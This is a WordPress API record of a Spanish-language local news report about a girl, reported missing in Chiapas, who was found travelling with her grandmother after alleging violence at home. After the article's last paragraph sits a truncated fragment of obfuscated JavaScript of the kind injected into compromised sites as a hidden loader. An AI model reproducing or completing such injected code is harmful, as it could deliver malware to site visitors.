{"id":10403,"date":"2023-06-06T03:58:29","date_gmt":"2023-06-06T03:58:29","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10403"},"modified":"2023-06-06T03:58:29","modified_gmt":"2023-06-06T03:58:29","slug":"nina-sufria-violencia-o-al-menos-eso-le-dijo-a-su-abuelita-por-lo-que-huyo-de-casa","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10403","title":{"rendered":"Ni\u00f1a sufr\u00eda Violencia o al menos eso le dijo a su abuelita, por lo que huy\u00f3 de casa"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"490\" height=\"909\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/WhatsApp-Image-2023-06-04-at-7.55.03-PM-1.jpeg\" alt=\"\" class=\"wp-image-10404\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/WhatsApp-Image-2023-06-04-at-7.55.03-PM-1.jpeg 490w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/WhatsApp-Image-2023-06-04-at-7.55.03-PM-1-162x300.jpeg 162w\" sizes=\"auto, (max-width: 490px) 100vw, 490px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- Una menor de edad se quej\u00f3 con su abuelita que sufr\u00eda Violencia, por lo que la ancianita viaj\u00f3 y vino a traerla desde Jiquipilas.<\/p>\n\n\n\n<p>De manera extraoficial se supo que la menor no fue secuestrada como circul\u00f3 en algunas redes sociales.<\/p>\n\n\n\n<p>La menor fue reportada como desaparecida la tarde de este domingo, pero fue localizada en Tuxtla Guti\u00e9rrez&nbsp; acompa\u00f1ada de su abuelita, quien pretend\u00eda llev\u00e1rsela a Jiquipilas.<\/p>\n\n\n\n<p>Los familiares fueron notificados en San Crist\u00f3bal y ser\u00e1 el ministerio p\u00fablico quien determine o tome cartas en el asunto, ya que la menor viajaba&nbsp;por su propia voluntad.<\/p>\n\n\n\n<p>Ha trascendido que la ni\u00f1a dijo a su abuelita que la mandaban incluso a vender, por lo que la abuela tom\u00f3 la decisi\u00f3n de tomar custodia sin que la mam\u00e1 supiera.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal San Crist\u00f3bal de Las Casas.- Una menor de edad se quej\u00f3 con su abuelita que sufr\u00eda Violencia, por lo que la ancianita viaj\u00f3 y vino a traerla desde Jiquipilas. De manera extraoficial se supo que la menor no fue secuestrada como circul\u00f3 en algunas redes sociales. La menor fue reportada como desaparecida la &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10404,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-10403","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10403","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10403"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10403\/revisions"}],"predecessor-version":[{"id":10405,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10403\/revisions\/10405"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10404"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10403"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10403"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10403"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}